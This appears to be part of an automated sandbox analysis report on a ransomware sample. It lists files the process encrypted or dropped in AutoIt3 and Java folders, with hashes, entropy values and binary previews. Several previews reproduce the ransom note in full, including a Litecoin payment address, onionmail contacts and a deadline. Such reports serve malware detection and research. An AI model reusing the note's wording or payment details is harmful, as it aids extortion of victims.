                                                                                                                                                                                                                                                Preview:.#:f.A.w.'7.8Rz%J...............k1..w.]..6u@....Z.Oz......LH.........'`..a@(D..1..l...h....O.....L..W.T0..-8|.0..7...f..7....U.x....u.>ax..#,^...1:.M..H^.[.....9....y.......6>......f.b..9....M$.Z....v....KoQy7..@......;I. ............c"......$#.$.........l..kcqJ>...'a...f.d..+..g...Y....-.;hY.P.P...i....H'....'a.%EI.})y..8.V.u.i.^.5.6.Z......_G}..a..._q...1.{......Um/.K....-a;..TS.........~.......@ ..8p..vw3..:...S..%.xw.ab..x.......v....|.p^.G..`T.D.....l.......E..y1..AX.....1c...<...d(~m)K.!.....N....lwK....%..4........".J'.R..q.Wsy..H...a..m.G...m../.^}.K#xk].'..g.]}T.!......0...Ww..u...Yr....+....+.B......tx.O.MEU.a.|......W...IU..{3.._o...E'.\.w.Rj!o/....n.!,...C?.....Mb..!h.)..!p.(6...[...G..S...<.H.$E...-......L...!...O.,..m#..c.G}.p.J.v{..+W.J...p${.K...GM......vW`.]...b...`e;....@4.......#z\...m..p5........T#....t... ..|V3!.b..qdD......Bp...Q......<..;G:8..%.n.k..iD..$. .+...E..l`v....-....\..H..DJW6l.....`.....*4s.,.K.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\AutoUpdateIt.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):30127
                                                                                                                                                                                                                                                Entropy (8bit):7.994754101198133
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:A0920hTyq9G3hzJVtfNBUgTddbQtgnDV5dqGfc9QR4G:n20hTyd3h9VvZ3eYj
                                                                                                                                                                                                                                                MD5:6C4A2FA5D279D0CC2B7CEBB69A225357
                                                                                                                                                                                                                                                SHA1:E118FF38D249D9614C9A088F1A922E50E8F3A8A5
                                                                                                                                                                                                                                                SHA-256:E3297135CE7B577DC4105172B9BAF8A13DB91F530D4F60E75BADA58B9A4CB305
                                                                                                                                                                                                                                                SHA-512:DB27798FC23CA9F2D79ABD87531A877C114425106AC6F89AB0FECA45A9E16A2B19403A8BA783C2103070E1B6CC4AB0CCC28B0686F190194EF1E23659AB63CAC2
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...[1@/{yd.O....|....R.l.D...A._.S.:2?.|..8.z..Q..\....<......H...X.x.2T..q.~O.n..]x..[..b../I.ZPz..?F.....i.....V..j..v.=.=.MC...'..@.~g.z..........D ..0C+...V.c..T.-#..x..N+.S....n9...).g.Sz..u.C.......<...>..^.L....[(........aQ....|Al!...L".|.0}.e..i......f$..z...Ly,.N.!n3.!.0..up ..ro.i.L...4O..v.G..k....I....1.....c....h.... .....'......@.`....8....^1...W...%.J..K.....%%"..P..[.....Z..S....W..W$.....a...X.....!......."...oP..Fs~.Dr<.....<.....9..X2..ZP"Y~NCe....+.Kx.e..byw..t'....Y.E..E....4....,z./b.W....-1...=.w..);&a....i...uGR.o........_.....0.i{...e.._..+)......Xhs...t.BO.^.j...7\z..F.=..r>....>.#m.mt...f...f.iK.p..UGx...g..F.Z......8...c!.FI."[.....e.c_8`<.....6..1d.u.O.G....[..-+).P..,-'R.Nf.J.....`..x?.8...\......B.....+$4....}.).>...0C......v/..=.*.Q;.xe;d.Qz.;.........V...........pc.]9VY^......m.}e-..A..AQ5....q.L......<E.C..B...e6..T.......A6Z..j.=U"..W._]}..G.~o.`.#.y..]..&..jy.6.W...9.))..{..<_=...M....;Q.ZL.z$...^...)Xl.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Extras\Editors\_ReadMe_.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):794
                                                                                                                                                                                                                                                Entropy (8bit):7.690971366242492
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:2Ln8imZzFEBtOdrgjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZmhR:2/mwbOdEjmJrc0YXUZtwsTqfdp
                                                                                                                                                                                                                                                MD5:2FE3EBD5D2DB13D18B1B1693DF935AD3
                                                                                                                                                                                                                                                SHA1:0E92A44A7F9B0E4BBEFACD7280F17ABD8267455B
                                                                                                                                                                                                                                                SHA-256:501F53B6122530619D94BFAAAFC81652192B818F0B02414FFB657FAD2AEB1641
                                                                                                                                                                                                                                                SHA-512:DA00724C167C1044E87F6814EF30AE797EAB3EC8E8D1A2C43AA6193DC63937C126460D2BF0609CA9309E805D7CC5554E66AFE78DE391DA9444D74B6BD6F06F45
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:I>.....P...).8....^..v.>HV..>n...'O..x0..$..U+8...........X.......pu..a..{..w..].....Q...c..\..........O..b~.\..R...r...d.5..1..g.-F..J......{.....:..N.O'w.pp.k.......p..j<8.....F..!.h.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.......l...T...~.lvd..l.>2Z.....s..[....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Extras\Geshi\autoit.php

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):125931
                                                                                                                                                                                                                                                Entropy (8bit):7.998537223946157
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:3072:A/MUw8s/R4pIM4IhEGaSLEwI8nkFBaQ3bi4QwM/wr:SMoI4KM4sREWkSR4QwgU
                                                                                                                                                                                                                                                MD5:3C3C2C2526185EEC6E217C6C31BB6BD1
                                                                                                                                                                                                                                                SHA1:13EDD8D7C7717C839D9E4A8417D6783815CC3E0A
                                                                                                                                                                                                                                                SHA-256:E5B9913A741644FCF784B11A78026F1BA0286703DDB24DBD294147F5D6A28D2B
                                                                                                                                                                                                                                                SHA-512:7A6865E713612A7177656F1350012E6BD5689A696922B49FCC68044C25CD2B6046620C8DBBDB2EE45E3535EE4F5E63F96875CB881F50744746E699C9BD3740D9
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:e..1J.....D$.......%.^D..s...B...../...k.......t....'..,'.{...E....P.vs.....M....G..le..'2....Jc....h.`....~...l.p<..V.....?.r_..R_.L).y....KO>...\...e...J..}p....R..&.z......i/&m...-f.%..y..M..l..`I.......+.`.e.....l(...n.D`...Cv..(..@..L4..n... .[,Y).a..z...VaU.^.)...:............<o:....5...I..n..LF..BC.B....xi.Q.....z........8..../..[...7...O....}.....i.4iE..#...).V...*..p..oe.....E.m..9...5;...f>..;?..Ib..h`.?..U.e}.....$...._..pk.j. .JS^3W0.H'.[`...7..'x.=...7?......-gN..F.G....y.....h*..q.N..i.~.W.*........^..yo!.f8......Ybk..nP.B.L+.qM.>.*..g;..Pi.e.r....k\...).%^t.......~..B{&.2.R......V.H.,..K...#K|.X.q.37Cq..9|2<d2#.T...o.:.f6...Y.~...c...a..o..J....L.....V/..E....(..=.^.C..u...vSH...y.vn]..v:...'...gcc...\....xCul..KDH".h.l.Q..#*9.B.........9........$.X.....8.......W.|.......Y.X2.O;{O72....u.d..1..%...;Yu..}e.....8..G.=..F.....K...8..r.L.o...EfD.......8........y;..u..\\t.8...aL..1.$U.^........V../.,I....Wn...5..~...5+.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Extras\Prettify\lang-autoit.js

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10045
                                                                                                                                                                                                                                                Entropy (8bit):7.983576811450976
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:YOXnlmwVCM3uk7MHG4pMd2qD0I2f6YXOypz2IBSSFjVAJMrBfXUUm:HNVgHGiMjD0I2nOyxAsNm
                                                                                                                                                                                                                                                MD5:831B0874357574C37F666C2095D74E87
                                                                                                                                                                                                                                                SHA1:6303DE574E45D874367B7D846E922928C8589DE6
                                                                                                                                                                                                                                                SHA-256:8AAD605E9982366518B1B156596EBACD53AAF8B9BD3B09FCDACF910B1E91BE63
                                                                                                                                                                                                                                                SHA-512:95B32A203ED1DD3805D88189C89CFE8B710277B56452F64DCCB1E39B6BC385958D72A59BB986D0498BEE1CFA8531C9096B3AFF6DE9E0CEF8C3EC45255F54CA07
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:P.e./#.y.....(.....<.&~.\.6........Q.`..)....S...$..t..b..p...|.P...{V5h^E..;1.d....3G@......8L..y.v4..i@.c..w..T.......H....0@..1.dO..5..y.......m..x...AYJH./I.@...,..5./....IY.z...-...7.).].k...Y.d.Q....2hi.A.1n.y.g.E}$..m....|ga.\.Wu...%..Z.5...f0.0. ...p.8....@....8.......#+.....u.~g..'.BS.La...V.i6.m4.d...zKM.NA.'K..'=JK....2..6...?IH..z....X.*.LJ..,...wr.......N.....3../..@...._x_>.C.F..<....;.V>.6.?.....8.j..$...w.!.i..u.y.."!.....L.%....]...G.]<(.p...B.t.`....b.......?......_.q..x.%O...I.oJ.7.xG,G.b..."fjt.....\{.(-...a5s._/>...0.....3.{r.`z.wyt. ..|:5.].R../..\....t.8m.........-...R.q\..Ri.......Dv1.|t..... ....(..P..o.o0......o.0...`?.......//..;.\ 0...^.o.=]*..D....?8.FR......:../..C...f../......ew<......V1....A9. UX.....L....lS...][>.N.z}._.&"..r....F...?q..K.|.....X.H.S....L.!.F...B....&......&...W.J.IVr..O.'..O..m:...8... e.....g?CS5:TU.`...5.....J.N.......B...-.!.e6.e.d......6Z<.y...2..q........m2."a.c........k..R!.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Extras\Prettify\prettify.css

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2194
                                                                                                                                                                                                                                                Entropy (8bit):7.89947997409468
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:H70mZ8Y7WfIXuMccJV8kWMBHyIy57fu/Gz9NBdPjT0L1H4o0jZtwZY:HVZ1CfI0aV8kWMBSf5D6G9zdPjoRklem
                                                                                                                                                                                                                                                MD5:8AE465523315AD5EA5C6DA12C7846C93
                                                                                                                                                                                                                                                SHA1:A629A6366AAB4ECBC091F4BCC3299906366D5950
                                                                                                                                                                                                                                                SHA-256:DB172CC995FE100F78B03B92F6BB2422AF1D89765D1F2B512F9F95BEB1E612F4
                                                                                                                                                                                                                                                SHA-512:0735BCD6BDFA81C9DF7527CD09D0A46509F5F842D9566D5178F976FAC60E7965D6342AA6C963A332848959A1D529C00E5B0D087D5DF77B9921299565620270CF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...*.......9..].f.R........Qf...@..b.X..u..u..J...R^V.g.......M:6...%.(;..>jCX...)B..l...K..zB..=~.3...4.K/.pn...;2.M.P.,....#R.4A:.9.D!...k....W1...Z...K...s3Wp@&w..c.k.._.T..Y.kG9~.W.+.....y..s.k...H..N9_.....u..v.."p.C.q.......I.j.....U...*....34t.*..j......~..[.-s.a....h..:.d`....~.....1./-g..K...H...t.$....G.b....$.g...!.xP...^..2..=. 3O{..R[}z.?..).......4....P.R...B/'$'.@..m...2..Y_v?o...Z...@<\...`f3...h....Z.2.\...\.>.zna.....[n..ym.W3L.k6.||40.+fl...Kn.HcU..R.S...3.i.k%...x.\..&r..[........A.....:...GU{...}.r.=z.=E#.Es...m.!.h.2.[!P.....d..J~p...NY`sW.S....G`{!...U..~z.9....)...g....RJ H..U.......p.k.....7M...c.f..........9KA'5.|.L... ......c.!..?...Q.8..$..U...Q.{...{..tSs...\.W/......0.,|....U...@..%9].&.......Y..H..H*.R..{'..q..........H..QJ}.(4./SD...N...^.....o@._z_MX.V..".o&U....G.s....x.+...Jw3j........'.^8..Z...|,..BY.\$k.V...v.*.."...p_.^(fZE1..>...3?..=f.+...s.....3&.....R'...KV...1V..k.@.!A........r.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Extras\_ReadMe_.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):785
                                                                                                                                                                                                                                                Entropy (8bit):7.7361094727849045
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:SgGWNcDmFEArlKmNmTS2DuMV9jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkX6:Sg/NWAyTS2N9jmJrc0YXUZtwsT6
                                                                                                                                                                                                                                                MD5:95ACD33F99D02F847F10D6BE472A2DF5
                                                                                                                                                                                                                                                SHA1:83EA42CDCB63488509DAB38B13C2F5002B04F831
                                                                                                                                                                                                                                                SHA-256:1D750FF5084E54A40843CE1B99C6D2165BEE1C48FC42DC9B2B235E90BD8A6C93
                                                                                                                                                                                                                                                SHA-512:53595312360086B193CF85708A4FE8B89A6714761376684F1346E32F3EC8D798D4F5CFD2F06793F5BD5452F28F9FEA844A50F0F42A9F83D41361F70EFB61A158
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.M...J..R.0...a..mU.k..jp\r.I.a.!...O.5.=.k"8a:0.. .Z.H0u..?u...j.^......x!..q.....wS7tV..s....T..E:ci._R.A.{#t.n.......".,V.......,....1%......:.%7`..CB.*..>....3.........>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.......o"..8.....X...0?K..;c....6......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2373216
                                                                                                                                                                                                                                                Entropy (8bit):7.227769305910325
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:VSXoV72tpBsGwi1aCvYdutluS2K4fYw44RxLh:k44wiICvYsuBB
                                                                                                                                                                                                                                                MD5:798741C857B9ED03A31B5FC189DF29B6
                                                                                                                                                                                                                                                SHA1:F2BB3EEC0A6D5F4309C79005C7FD6EEF66A849FD
                                                                                                                                                                                                                                                SHA-256:65EB9FAD8CA9714BE92F76DEC667DAA82E291C5AC76C019890AB9E68C4FFF1A1
                                                                                                                                                                                                                                                SHA-512:405353BD3493CC90D0D33124A1BF9907F65359BE7D7C01245E56A2B5249E3BE86EA9E036F935116B0DA90464759C6B549780A9D0587FFCE414EF0B09F783D205
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.B.W..Z.{.J..>....K}....Z=/.J[*v.._I.........].<.L.I..Y;k....L...T.Op......U.\........y.j/.R..S...0..5p..s.....7..+3E....>. *rP.,.r..].K.N.....3.(....O.........6..!].../6~............'.......t.....l..w.....+..`.?!.ECu....n...+........`q.....q(=8...`5...XA7.r!|./D.;e..5^.....JO..m.....i.X.. ,..^..o...J..w.......Q.(..$l.[.........j.n8A2.>.R.....f..KZ'.@.L.=.O.....A..A&.%.2Lk/.H(.Y..w/-........My~...s7..eM.?._.....1.. .P..n..*..94O.....R..m".V.6.><....)7()@.y0.N.l..f..#.%.BV....M....Bs...k......x...0..LO.F\ZP8..1d.5...hT1.r.G.x)....'S....-n..QVY7...e[.$C...n"...v..q....2.....E...b.........:U.O...1..T.a.%.r..X....6lQG_/\l....Y.SQ.....;.....(....K..*!b.i&>........U9..Q..&.W...|..j......+K=03..{S.b9..`.H$;..E..D..<W8A..C8.#.....B...ZWr..J...<MD...?.D.+..{g..S.'...p,>.....mt....?....j......R\..Jx.[\.n..Z...%TC...M.....Qr>..M..Z........x..l...uD.O8..Q`.d\.o,....}....0......i.......}lK..U....n..la.J..?..Z.G~6..)..z%.#uo..P...H<.!.h].J

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\SciTE\api\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\SciTE\au3.keywords.properties

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):92207
                                                                                                                                                                                                                                                Entropy (8bit):7.998062050405139
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:GEeoD32y0LEkIEutjgG1cmLZw1k5+Owq44GwMkjaXszvo6eylf6J:vbTdiut8+cmLZw1g+Oj4//kja4vogf6J
                                                                                                                                                                                                                                                MD5:69D97702551424BB26E1C80D2BC95282
                                                                                                                                                                                                                                                SHA1:BFB1605ED40D9F6B5EBDDDB6843D8425E900314C
                                                                                                                                                                                                                                                SHA-256:D64EA22C469D75E8F445CD72C73CF2A281D08FCE4C71458B44F32C38F9A1A905
                                                                                                                                                                                                                                                SHA-512:5C5E6C69D9C020F0EA44DAADA07F1972375B82B1541F54C140FAE45F9114029E06DCE3C67EB4D036D647CFF0A0916064CC64DD87C049E9E9536404438D035FAF
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:6.FcO..lh....X...Y.'w(.'.W.p.\.._.xaP...FR?GXKYR...=......*.J..i...8,.=..0P#....R_....w.=..'.......AK6...a...q....>...H.{...|.K....N.....s..'.y.=..J.....S...z...?j....K..Z..(....f.CE.u7..c..B.ie.P.....k.....W ......I-..{u.."...9J...>_!?..d..97H..I...7e,rf.!Ogp.R.i.0w...XR?...&h...0Q-5.~B.........L.<.qt....#.].v.I...S............K.00....t3.A....j.*X.}..f.......D@....~=..z.,3.d.*.M.8z.6R......`..l.W.S.../....5.&..$mA.RKoO...F.....]....;......~.x%.K2.Sp.P..4..d. ..BI...]*q...L....#...ka.(...B..).20qSTD.Q.gGL....a.>z.c.TP.\7....*.d..c.......g9.~.P...U.@GT.R.i.1..d..^..z..b.'...3.P.w..q9~....;..z....$6R../KX.<..}.. g..yv..F..`.....U.8.9B/i.......U.6..$...bA.....-.^...:....s2.t..o.i'b)......Xzaj...B......IS.,R-.ZI..l.oL.SK1.|.,.@..A....Yt......C...........z.......>..lOe2.mS{:...d..W.W.?..~....g.v."..<0Enf.....X.B..iCsu/c....1L..e.......S1.#.H...p......#.(x..6.n...*..._......~`..*r..V....Nf..<.........9\Sx..^D....{?..(.;.c...F...H..d.sLd

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Uninstall.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):72369
                                                                                                                                                                                                                                                Entropy (8bit):7.997436425283704
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:6bJQiMZYiDiyGa+YqeZjvgT055JgU0pt+XMLr+Ev:EpriWa+uZa0JwpEM+Ev
                                                                                                                                                                                                                                                MD5:70EDFC69B44E40274864C288692168F4
                                                                                                                                                                                                                                                SHA1:83CCAEDDC6E9540F07341C0655251508B7D4BC1D
                                                                                                                                                                                                                                                SHA-256:59707DD77489979B430CC8CBDE2A8828ABAE7A233CAF7AD78741B5AAEC8CD3E1
                                                                                                                                                                                                                                                SHA-512:27648DFC28E79910B8454CFC65D1DC179C3A6AB098E533B887C9A4910FD8C65C7DFF1A93874FD5EE0DAF2821026D6A4F8057A95564FAB4E92F1E5A2C7F93855F
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:......R..Q=..i"..(xB*G.z..........-P..$.t...m...*s......_1...T...{.C.C...&...L...'".Wd....{y..@.....Y.~.-...|..M....>.......!~J.]...n.....KNP)...n.z...(p..,/.=..f...p.V...?^.E.2..j..H...59.z...&....'=....|2.6.o.O.....W..........'.tku...Nh...=..&...]..a.O.M....g`.I[...(.....5V..Ym....b....i.e..KG...I..A.U.....P...3."..."..A.l.2k|.W.yS.8......8..7..jtw...3j..r".Q.t^/a..=....;.l...qn.+...9}.05.E.+a.N...N...5..ZW.Ne...6...`...=&.?....E.k...?./...........}X..........;@.c.N../.i....R4......X.bn._t..=...j.,TC1w..6.....X..QhQ....$......?X..xj..Xt!.)....O>.J=...V...E$.r.|g4.6b...5@....,...).x...(%...F..8.#Y..V..k.....]....0~2...9.!..3....YR....l."....._A3.N..>e#.. .Z.....cv..@...m..y..c.H.z...2.YW\.B2.U. `.....Z..)j4/......x.a..$!.q.=..L..U?......-.Q..m.V.*{..U..D..t..|=.6.H...,.:..D..d.....FS.....W..O.&w.T5.....F5.B..@.....3.....@.C...Tb..lc.....9.l.`&.....3{.hAm.A.Nb....3..j8...... ...._.C....p....@j..v.a.NF.. .Y\&5....d}.........\.JX...."8A

                                                                                                                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\bin\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\legal\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\lib\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
